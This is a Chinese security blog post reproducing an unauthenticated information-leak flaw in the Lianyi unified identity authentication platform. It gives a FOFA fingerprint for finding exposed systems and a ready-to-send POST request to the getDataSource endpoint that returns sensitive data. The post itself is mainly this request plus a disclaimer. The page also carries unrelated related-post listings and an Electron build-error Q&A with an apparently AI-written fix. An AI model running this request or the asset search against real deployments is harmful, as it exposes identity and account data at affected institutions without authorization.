【漏洞复现】联奕统一身份认证平台getDataSource存在信息泄露漏洞

原创 已于 2024-03-28 17:27:16 修改 · 1.6k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

于 2024-03-28 17:26:40 首次发布
这篇文章揭示了联奕统一身份认证平台的一个未授权访问漏洞,攻击者可通过特定请求获取敏感数据。文章提供了漏洞复现步骤以及提醒读者此类信息仅供安全检测和维护使用,非授权操作需自行负责。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

联奕统一身份认证平台 getDataSource 未授权访问,攻击者可通过此漏洞获取敏感信息。

二、影响版本

联奕统一身份认证平台

三、资产测绘

  • fofa:icon_hash="772658742"
  • 特征

image-20240326234635891

四、漏洞复现

POST /api/bd-mdp/serviceManager/outInterface/getDataSource HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Transfer-Encoding: chunked
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

0

image-20240326234137810

漏洞复现】EPON上行A8-C政企网关信息泄露漏洞
晚风不及你
02-05 1373
EPON上行A8-C政企网关是一款终端产品,提供企业网络解决方案。
漏洞复现】用友GRP-A++-selectdatasourceinfo-未授权
知黑而守白
01-26 321
用友政务GRP-A++综合计划财务产品,以“平台化应用、智能化管控、专业化服务”为技术、服务理念,以独创的面向“岗位角色”产品定义思想,综合利用JAVA、智能表单、工作流及最新的互网、云计算、移动应用等先进技术;融合部门综合计划财务管理领域内的预算编报与分配、预算执行控制、资金计划审批、财务报销、合同支付、集中核算、汇总报表、财务监督、领导查询决策,以及财务服务、移动审批等应用共同构成了GRP-A++综合计划财务管理软件平台软件产品。
漏洞挖掘 | EDU拿敏感信息的骚思路
zkaqlaoniao的博客
08-16 1813
在进行edu漏洞挖掘的时候,我们常常遇到统一认证平台,账号是学号,密码是身份证后6位(甚至是更复杂的密码),同时找到这两者的几率很小,所以我们把关注点放在微信小程序中,因为微信小程序存在一键授权登录,不需要本校学生的学号和密码(小部分),这里我们找学校的小程序,直接搜索大学,职业学院等字样
用友 NC 敏感信息泄露
qq_36334672的博客
01-25 715
【代码】用友 NC 敏感信息泄露
漏洞复现统一身份认证平台getDataSource未授权访问漏洞
qq_34780861的博客
03-19 2059
统一信息门户平台(LYASP_v3.0)定位于对数字校园中的信息和应用系统进行整合,统一控制用户对信息和应用系统的访问,利用统一身份认证系统,为用户提供一个单一的访问入口(SSO)。
web渗透测试----11、身份认证漏洞
七天
03-10 5974
文章目录一、什么是身份认证?1、身份认证三要素:2、身份认证和授权的区别:二、身份验证漏洞如何产生?三、身份认证常见的漏洞一、基于密码的登录漏洞1、密码破解2、用户名猜解3、用户名枚举4、目前防止暴力攻击的最常见方法是:二、双因子身份验证中的漏洞1、绕过双因子验证2、双因子验证逻辑错误3、暴力破解2FA验证码三、其他身份验证机制中的漏洞1、保持用户登录状态2、重置用户密码四、身份认证相关漏洞的防御 一、什么是身份认证? 身份认证是验证给定用户或客户端身份的过程。简单理解就是如何让别人相信你就是你。 1、
身份验证系统遗漏:身份验证和授权系统的安全设置不足
ZOMO的博客
01-31 996
身份信息和用户数据往往具有敏感性并涉及到个人隐私保护,因此需要确保这些信息的完整性与保密性。当前很多企业的数据库可能未采取足够的加密技术,易受到黑客攻击和数据泄露的风险影响。另外,尽管许多公司会定期对这些数据进行备份以保证灾难恢复能力,但备份文件的有效期管理也需要重视起来以免旧数据的过期导致不必要的麻烦。通过对身份验证系统与授权过程的深入研究和分析我们发现了一些亟待解决的问题和挑战。只有在充分了解这些问题的基础上我们才能够找到有效的方法来解决它们从而为企业和用户提供更安全的网络环境。
Grafana 未经授权的任意文件读取漏洞复现(CVE-2021-43798 )
千寻的博客
12-16 3912
文章目录漏洞名称漏洞编号漏洞描述影响版本fofa漏洞复现步骤修复建议参考链接免责声明 漏洞名称 Grafana 未经授权的任意文件读取 漏洞编号 CVE-2021-43798 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 影响版本 Grafana 8.x fofa app
二十八种未授权访问漏洞合集(暂时最全)
墨痕诉清风的博客
01-04 5422
目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 0x06 Dubbo 未授权访问 0x07 Druid 未授权访问 0x08 Elasticsearch 未授权访问 0x09 FTP 未授权访问 0x10 HadoopYARN 未授权访问 0x11 JBoss 未授权访问 0x12 Jenkins 未授权访问 0x13 Jupyt
Confluence 文件读取漏洞(CVE-2019-3394)分析
晓得哥的博客
09-03 2462
作者: Badcode@知道创宇404实验室 日期: 2019/08/29 英文版本 前言 下午 @fnmsd 师傅发了个 Confluence 的预警给我,我看了下补丁,复现了这个漏洞,本篇文章记录下这个漏洞的应急过程。 看下描述,Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞:具有“添加页面”空间权限的远程攻击者,能够读取 /conflu...
服务器内存持续增长,但没有明显的内存泄漏,可能是什么原因?如何排查?
最新发布
大模型大数据攻城狮的专栏
04-27 803
从操作系统层面来看,内存持续增长的现象可能与虚拟内存交换、页面置换策略、内核参数配置以及文件系统缓存等多种因素相关。这些机制在设计上旨在优化资源利用,但在特定负载或配置不当的情况下,可能导致内存使用量的异常表现。排查此类问题时,建议从监控工具入手,结合vmstat、free以及/proc/meminfo等信息,分析内存使用模式的细节;同时,针对性地调整内核参数,优化交换和缓存策略。
arris 路由器 basic_sett 未授权信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
04-02 574
Arris路由器是一款功能丰富、性能稳定的网络设备,适用于家庭和办公环境,提供可靠的网络连接和路由功能。arris路由器 basic_sett接口处存在未授权信息泄露漏洞
Coremail邮件系统存在配置信息泄露漏洞(CNVD-2019-16798)
墨痕诉清风的博客
11-09 8286
目前,论客公司已发布补丁进行修复,针对Coremail XT5和Coremail XT3/CM5版本,补丁编号为CMXT5-2019-0002,程序版本1.1.0-alphabuild20190524(3813d273)。综合CNVD技术支撑单位报送、白帽子报送、CNVD秘书处主动探测的结果显示,我国境内共有1484台服务器受此漏洞影响,影响比例约为4.0%。邮件系统的mailsms模块的参数大小写敏感存在缺陷,使得攻击者利用该漏洞,在未授权的情况下,通过远程访问URL地址获知。...
漏洞复现】海康威视频编码设备接入网关存在信息泄露漏洞
https://blog.echo234.cn/
04-01 734
杭州海康威视数字技术股份有限公司视频编码设备接入网关存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。
漏洞复现】上海真兰燃气收费系统信息泄露漏洞
晚风不及你
01-19 491
上海真兰仪表科技股份有限公司,成立于2011年,真诺测量仪表成员,位于上海市,是一家以从事仪器仪表制造业为主的企业。
锐捷网络NBR700G 信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
11-15 711
锐捷网络NBR700G路由器是锐捷网络股份有限公司的一款无线路由设备,锐捷网络NBR700G路由器存在信息漏洞
某业务管理系统信息泄露
iSee857的博客
08-23 561
禁用受影响功能:立即禁用或限制受影响的登录功能,防止利用漏洞进行未授权访问。
漏洞复现】海康威视-视频编码设备接入网关-userinfodata-信息泄露
知黑而守白
03-20 338
海康威视视频编码设备接入网关是一款集IP视频编码设备接入服务、视频转码服务、云台控制服务,权限管理、日志管理、设备资源及运维管理等功能于一体的电信级视频接入网关设备。海康威视-视频编码设备接入网关 userinfodata 接口存在一个信息泄漏漏洞,使得未经授权的用户或攻击者可以获取敏感信息。
漏洞复现】Dedecms信息泄露漏洞(CVE-2018-6910)
晚风不及你
12-20 4286
DesdevDedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)科技有限公司的一套开源的集内容发布、编辑、管理检索等于一体的PHP网站内容管理系统(CMS)。
makensis.exe exited with code ERR_ELECTRON_BUILDER_CANNOT_EXECUTE Output: Command line defined: "APP_ID=com.jcloud.shixinhua.kantuwang" Command line defined: "APP_GUID=f756239e-0578-500f-8e70-d9a7ed28da2f" Command line defined: "UNINSTALL_APP_KEY=f756239e-0578-500f-8e70-d9a7ed28da2f" Command line defined: "PRODUCT_NAME=��ͼ��" Command line defined: "PRODUCT_FILENAME=��ͼ��" Command line defined: "APP_FILENAME=leidian" Command line defined: "APP_DESCRIPTION=kantuwang" Command line defined: "VERSION=1.0.26" Command line defined: "PROJECT_DIR=D:\���\�ֻ����\1_1_h5-image-template-proj" Command line defined: "BUILD_RESOURCES_DIR=D:\���\�ֻ����\1_1_h5-image-template-proj\dist_electron" Command line defined: "APP_PACKAGE_NAME=leidian" Command line defined: "MUI_ICON=D:\���\�ֻ����\1_1_h5-image-template-proj\build\ktw.ico" Command line defined: "MUI_UNICON=D:\���\�ֻ����\1_1_h5-image-template-proj\build\ktw.ico" Command line defined: "APP_64=D:\���\�ֻ����\1_1_h5-image-template-proj\dist_electron\leidian-1.0.26-x64.nsis.7z" Command line defined: "APP_64_NAME=leidian-1.0.26-x64.nsis.7z" Command line defined: "APP_64_HASH=7746E13555ED88FD120D0DD1DB898C2E9A370C2454BEBF266C4B7EA4855A43F441A1655305EFD74DA0065E08DD2E8F56BF51484303FC3ADCCFCB8E2C41812B9D" Command line defined: "COMPANY_NAME=kantuwang" Command line defined: "APP_PRODUCT_FILENAME=��ͼ��" Command line defined: "APP_INSTALLER_STORE_FILE=leidian-updater\installer.exe" Command line defined: "COMPRESSION_METHOD=7z" Command line defined: "HIDE_RUN_AFTER_FINISH" Command line defined: "MULTIUSER_INSTALLMODE_ALLOW_ELEVATION" Command line defined: "INSTALL_MODE_PER_ALL_USERS_REQUIRED" Command line defined: "allowToChangeInstallationDirectory" Command line defined: "SHORTCUT_NAME=��ͼ��" Command line defined: "UNINSTALL_DISPLAY_NAME=��ͼ��" Command line defined: "MUI_WELCOMEFINISHPAGE_BITMAP=${NSISDIR}\Contrib\Graphics\Wizard\nsis3-metro.bmp" Command line defined: "MUI_UNWELCOMEFINISHPAGE_BITMAP=${NSISDIR}\Contrib\Graphics\Wizard\nsis3-metro.bmp" Command line defined: "ESTIMATED_SIZE=338749" Command line defined: "COMPRESS=auto" Command line defined: "BUILD_UNINSTALLER" Command line defined: "UNINSTALLER_OUT_FILE=D:\���\�ֻ����\1_1_h5-image-template-proj\dist_electron\__uninstaller-nsis-leidian.exee" Processing config: C:\Users\ASUS\AppData\Local\electron-builder\Cache\nsis\nsis-3.0.4.1\nsisconf.nsh Processing script file: "<stdin>" (ACP) Error output: !include: could not find: "D:\外包\手机真机\1_1_h5-image-template-proj\node_modules\app-builder-lib\templates\nsis\include\StdUtils.nsh" Error in script "<stdin>" on line 1 -- aborting creation process at ChildProcess.<anonymous> (D:\外包\手机真机\1_1_h5-image-template-proj\node_modules\builder-util\src\util.ts:250:14) at Object.onceWrapper (node:events:628:26) at ChildProcess.emit (node:events:513:28) at ChildProcess.cp.emit (D:\外包\手机真机\1_1_h5-image-template-proj\node_modules\cross-spawn\lib\enoent.js:34:29) at maybeClose (node:internal/child_process:1100:16) at Process.ChildProcess._handle.onexit (node:internal/child_process:304:5) { exitCode: 1, alreadyLogged: false, code: 'ERR_ELECTRON_BUILDER_CANNOT_EXECUTE' }解决这个报错
03-17
<think>嗯,用户遇到了一个错误,makensis.exe退出了,错误代码是ERR_ELECTRON_BUILDER_CANNOT_EXECUTE。首先,我需要理解这个错误的原因。根据提供的日志,错误信息显示无法找到StdUtils.nsh文件,路径是"D:\外包\手机真机\1_1_h5-image-template-proj\node_modules\app-builder-lib\templates\nsis\include\StdUtils.nsh"。看起来问题出在NSIS脚本处理时找不到这个头文件。 首先,应该检查这个文件是否真的存在。可能的情况是node_modules里的依赖没有正确安装,或者路径中有中文字符导致的问题。用户的项目路径中有“D:\外包\手机真机”,这些中文字符可能会让NSIS处理时出现编码问题,尤其是在Windows系统上,如果系统区域设置不是中文,可能导致路径识别错误。 另外,用户可能在安装依赖时使用了npm或者yarn,但可能由于网络问题导致部分文件没有下载完整。或者是electron-builder的缓存问题,需要清理缓存重新安装。 还有可能是electron-builder版本的问题,某些旧版本可能存在路径处理的问题,尤其是在包含非ASCII字符的路径下。因此,建议用户升级electron-builder到最新版本,看看是否能解决这个问题。 此外,用户的项目路径中有空格,比如“1_1_h5-image-template-proj”,虽然通常空格不会有问题,但有时候某些工具处理时可能会有异常,不过结合错误提示,主要问题还是路径中的中文字符。 解决方案可能包括:确保依赖安装正确,清理缓存,重新安装node_modules;将项目路径改为全英文;更新electron-builder;手动检查缺失的文件是否存在,或者尝试手动复制StdUtils.nsh到指定路径。 需要逐步排除可能的原因,先从简单的步骤开始,比如清理缓存和重新安装依赖,如果不行再尝试修改项目路径,最后考虑升级工具版本或者手动修复文件路径。</think>这个错误是由于NSIS打包过程中无法找到`StdUtils.nsh`脚本文件导致的。以下是分步排查和解决方案: --- ### **错误原因分析** 1. **路径编码问题** 日志中路径包含中文乱码(如`D:\���\�ֻ����\...`),说明系统或构建工具可能无法正确处理中文字符路径。 2. **依赖文件缺失** `StdUtils.nsh`是NSIS插件库文件,electron-builder未正确安装或缓存损坏导致文件丢失。 3. **node_modules问题** 依赖安装不完整或权限问题导致`app-builder-lib`模块未正确加载。 --- ### **解决方案** #### 步骤1:修复路径编码问题 - **临时方案** 将项目移动到**纯英文路径**(如`D:\projects\h5-template`),避免中文目录。 - **永久方案** 修改系统区域设置为UTF-8(Windows设置 → 时间和语言 → 区域 → 更改系统区域设置 → 勾选"Beta版: 使用Unicode UTF-8...")。 #### 步骤2:清理并重装依赖 ```bash # 删除现有依赖 rm -rf node_modules rm -rf package-lock.json # 清除electron-builder缓存 npm cache clean --force rm -rf ~/.cache/electron-builder # 重新安装依赖 npm install ``` #### 步骤3:手动修复缺失文件 如果错误仍存在,尝试手动操作: 1. 从[NSIS StdUtils插件仓库](https://github.com/SuperPat45/NSIS-StdUtils)下载`StdUtils.nsh`。 2. 将其复制到以下路径: ``` node_modules/app-builder-lib/templates/nsis/include/ ``` #### 步骤4:升级electron-builder ```bash npm install electron-builder@latest --save-dev ``` --- ### **补充说明** - **日志中的乱码问题** 若控制台输出仍有乱码,尝试在构建命令前设置编码: ```bash set NODE_OPTIONS=--openssl-legacy-provider npm run build ``` - **NSIS版本兼容性** 确保系统安装的NSIS版本与electron-builder兼容,建议使用NSIS 3.0+。 --- 完成上述步骤后,重新运行构建命令即可解决此问题。如果仍有其他依赖缺失,请按相同逻辑补充对应文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值